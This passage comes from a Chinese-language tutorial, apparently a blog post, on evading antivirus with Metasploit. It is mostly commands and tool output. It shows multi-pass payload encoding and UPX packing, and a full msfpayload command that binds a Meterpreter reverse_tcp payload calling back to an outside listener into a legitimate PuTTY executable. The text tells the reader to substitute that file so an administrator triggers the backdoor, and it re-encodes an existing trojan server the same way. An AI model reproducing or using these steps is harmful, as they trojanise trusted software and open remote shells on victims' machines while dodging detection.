[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
[*] x86/bloxor succeeded with size 547 (iteration=1)
[*] x86/bloxor succeeded with size 617 (iteration=2)
[*] x86/bloxor succeeded with size 677 (iteration=3)
[*] x86/countdown succeeded with size 695 (iteration=1)
[*] x86/countdown succeeded with size 713 (iteration=2)
[*] x86/countdown succeeded with size 731 (iteration=3)
[*] x86/countdown succeeded with size 749 (iteration=4)
[*] x86/countdown succeeded with size 767 (iteration=5)
最后生成av.exe,这里我们可以测试一下生成的exe是否可以正常运行,丢到windows里面运行一下,请自行测试,我就不截图了。
如果运行正常,还不放心杀毒软件会干掉,那么我们再用upx加个壳?
exploit@ubuntu:/pentest/framework3$ upx -5 av.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe av.exe
Packed 1 file.
这种的生成的payload运行之后,没有什么反应,如果是作为渗透者自己来用的话,可能会做的比较隐蔽,有时候我们需要管理员或者目标主机上的其他人来触发这些payload程序,那么我们就需要用到比较隐蔽和猥琐的触发方式了,用标准的官方语言说就是:建立以标准文件模版为基础的payload文件,通俗点说就是搞个捆绑器,把shellcode我们正常的程序捆绑在一起,当管理员运行正常程序的时,就会触发我们的payload后门
a.exe是一个正常的putty程序,我们把shellcode和putty捆绑在一起生成一个新的程序
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -k -x /pentest/framework3/a.exe -o putty.exe
[!] ************************************************************************[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
可以看到我们生成了新的putty.exe,只需要替换掉原来的putty.exe即可,当管理员运行我们加工后的putty.exe时,就会触发我们的后门。
前面提到了,我们要对原本已经有的,比如通过其他的木马生成器生成的木马服务端进行免杀,那我们同样可以使用这样的模式来进行免杀,看实际的操作例子,这里的a是我们原始的putty文件,payload是我们生成的木马服务端,通过捆绑免杀,生成新的putty.exe
exploit@ubuntu:/pentest/framework3$ msfencode -i /pentest/framework3/payload.exe -e x86/shikata_ga_nai -c 5 -x -k /pentest/framework3/a.exe -o putty.exe
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 73860 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 73889 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 73918 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 73947 (iteration=5)
接下来介绍msfvenom,msfvenom兼顾了msfencode和msfpayload的功能,所以将逐步替代msfencode和msfpayload,先看下参数
exploit@ubuntu:/pentest/framework3$ msfvenom -h
Usage: /usr/local/bin/msfvenom [options]
Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format
Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
-s, --space The maximum size of the resulting payload
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
--payload-options List the payload's standard options
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
-h, --help Show this message
--help-formats List available formats
这里我们对msfvenom的参数一一解释
-p —payload 利用哪个payload来生成
-l —list 列出模块类型: payloads,encoders,nops,all
-n —nopsled
扫一扫
607
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
